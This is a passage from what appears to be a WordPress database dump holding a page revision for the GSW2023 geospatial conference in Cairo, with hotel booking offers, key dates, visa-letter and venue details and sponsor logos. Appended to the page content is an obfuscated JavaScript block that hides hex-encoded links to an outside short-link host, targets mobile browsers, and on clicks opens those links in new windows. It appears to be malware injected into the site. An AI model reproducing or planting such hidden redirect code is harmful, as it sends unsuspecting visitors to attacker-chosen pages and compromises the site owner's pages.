css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-13 16:30:43','2023-08-13 16:30:43','',3066,'https://gsw2023.com/?p=5130',0,'revision','',0),
(5131,1,'2023-08-13 16:32:27','2023-08-13 16:32:27','<h2 style=\"text-align: center;\"><span style=\"font-size: 36pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span>\r\n<span style=\"font-size: 36pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h2>\r\n[vc_separator style=\"shadow\" border_width=\"10\"]\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]\r\n<h4 style=\"text-align: center;\"></h4>\r\n&nbsp;\r\n\r\n<a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px 